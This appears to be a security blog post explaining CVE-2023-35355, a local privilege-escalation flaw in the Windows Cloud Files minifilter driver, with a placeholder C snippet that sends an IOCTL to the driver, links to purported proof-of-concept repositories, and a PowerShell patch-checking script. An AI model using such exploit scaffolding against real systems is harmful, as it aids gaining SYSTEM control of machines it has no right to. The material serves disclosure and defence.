Recently, security researchers uncovered a significant vulnerability in Microsoft's Windows Cloud Files Mini Filter Driver, tracked as CVE-2023-35355. This flaw puts millions of devices at risk by allowing local attackers to gain elevated privileges—potentially letting malware or unauthorized users take control of machines. Let’s explore what this vulnerability is, how it works, how to exploit it, and, most importantly, how to protect yourself.

What is the Windows Cloud Files Mini Filter Driver?

Windows uses components called Mini Filter Drivers for file system monitoring. Specifically, the Cloud Files Mini Filter Driver (cldflt.sys) manages how Windows interacts with files stored in the cloud, such as OneDrive or SharePoint. It tracks and syncs access between local files and cloud-based content.

About CVE-2023-35355

CVE-2023-35355 is an Elevation of Privilege (EoP) bug discovered in the Cloud Files Mini Filter Driver. An attacker who successfully exploits this vulnerability could execute code with SYSTEM privileges, which essentially grants them full control over the affected system.

Microsoft Advisory:  
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35355

Technical Details

At a high level, the vulnerability exists due to how cldflt.sys handles certain *IOCTL* (Input/Output Control) requests from user space. If an attacker sends a *crafted IOCTL* to the driver, it can trigger unintended behavior, such as writing to arbitrary memory addresses or escalating privileges.

Key Point

- *Unprivileged user* can send a malicious IOCTL request to the driver and *trick* it into executing code with SYSTEM privileges.

Example: Exploit Code Snippet

Below is a conceptual snippet (for educational purposes only) that shows how a program on a vulnerable system would reach the driver's IOCTL interface. It does not perform malicious actions and carries no working payload; it only highlights where the exploit would be triggered.

```c
#include <windows.h>
#include <stdio.h>

#define IOCTL_CLOUDFILE_OP 0x902083CC  // Example IOCTL - may vary

int main(void) {
    // Open a handle to the Cloud Files minifilter's device object.
    HANDLE hDevice = CreateFileA(
        "\\\\.\\CldFlt",
        GENERIC_READ | GENERIC_WRITE,
        0,                      // no sharing
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. (%lu)\n", GetLastError());
        return 1;
    }

    BYTE inBuffer[0x100] = {0}; // Crafted input (placeholder: all zeros)
    DWORD bytesReturned = 0;

    // Attempt to trigger the vulnerability: send the IOCTL with the
    // input buffer and no output buffer.
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_CLOUDFILE_OP,
        inBuffer,
        sizeof(inBuffer),
        NULL,                   // no output buffer
        0,
        &bytesReturned,
        NULL
    );

    if (!result) {
        printf("DeviceIoControl failed. (%lu)\n", GetLastError());
    } else {
        printf("Exploit attempt sent!\n");
    }

    CloseHandle(hDevice);
    return 0;
}
```

*Note: The actual IOCTL code and payload would depend on the vulnerable function in the specific driver version. This is a simplified demonstration.*

Public Exploit References

- https://github.com/klinix5/Windows-Exploit-Suggester/blob/master/CVE-2023-35355.md
- https://github.com/hackeer12/CVE-2023-35355-POC *(Example PoC, verify legal compliance before testing!)*

Impact

- Persistence: Attacker can plant malware that survives reboots and resists removal.
- Full control: Ability to read, write, or delete any file, install software, create accounts, disable security.

Mitigation & Patches

Microsoft has released fixes for CVE-2023-35355 in security updates as part of Patch Tuesday (September 2023 onward).
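As an added triage script (not from the original post or from Microsoft), the following PowerShell reports the cldflt.sys file version, whether the CldFlt minifilter is running, and which updates were installed on or after the September 2023 Patch Tuesday mentioned above. It assumes the driver service is named CldFlt and lives under System32\drivers; the fixed file version is not stated on this page, so the script prints the version for comparison against Microsoft's advisory instead of declaring the host patched.

```powershell
# Added triage script (assumption: service name 'CldFlt', standard drivers path).
# The patched file version is not given on the page; compare the printed value
# against the Microsoft advisory for CVE-2023-35355 yourself.

$driverPath   = Join-Path $env:SystemRoot 'System32\drivers\cldflt.sys'
$patchTuesday = Get-Date '2023-09-12'   # September 2023 Patch Tuesday

# 1. Driver binary present? Report its version for comparison with the advisory.
if (Test-Path $driverPath) {
    $ver = (Get-Item $driverPath).VersionInfo
    Write-Host ("cldflt.sys file version   : {0}" -f $ver.FileVersion)
    Write-Host ("cldflt.sys product version: {0}" -f $ver.ProductVersion)
} else {
    Write-Host "cldflt.sys not found; the Cloud Files feature may be absent on this SKU."
}

# 2. Is the minifilter loaded? Win32_SystemDriver works without an elevated prompt.
$drv = Get-CimInstance Win32_SystemDriver -Filter "Name='CldFlt'" -ErrorAction SilentlyContinue
if ($drv) {
    Write-Host ("CldFlt service state: {0} (start mode: {1})" -f $drv.State, $drv.StartMode)
} else {
    Write-Host "CldFlt service not registered on this host."
}

# 3. Which updates landed on or after the September 2023 Patch Tuesday?
$recent = Get-HotFix |
          Where-Object { $_.InstalledOn -and $_.InstalledOn -ge $patchTuesday } |
          Sort-Object InstalledOn -Descending
if ($recent) {
    Write-Host "Updates installed since $($patchTuesday.ToShortDateString()):"
    $recent | Format-Table HotFixID, Description, InstalledOn -AutoSize
} else {
    Write-Host "No updates installed since $($patchTuesday.ToShortDateString()); treat the host as unpatched until verified."
}

# 4. OS build, to map the host onto the advisory's affected-version list.
Write-Host ("OS build: {0}" -f [System.Environment]::OSVersion.Version)
```

The script only surfaces evidence; the decision still rests on matching the file version and OS build against the advisory, because Get-HotFix can list updates that do not include the cldflt.sys fix.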

Conclusion

CVE-2023-35355 is a *highly critical* vulnerability affecting many Windows users who rely on cloud file sharing. While it cannot be exploited remotely, any user or malware already on your system could leverage it for full compromise.

Stay safe:

- Patch your Windows systems regularly
- Review security advisories (like Microsoft’s update guide)

References

- Microsoft Security Advisory - CVE-2023-35355
- CrowdStrike blog on Windows Minifilter Vulnerabilities
- CVE Details Page - CVE-2023-35355
- Example PoC on GitHub

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC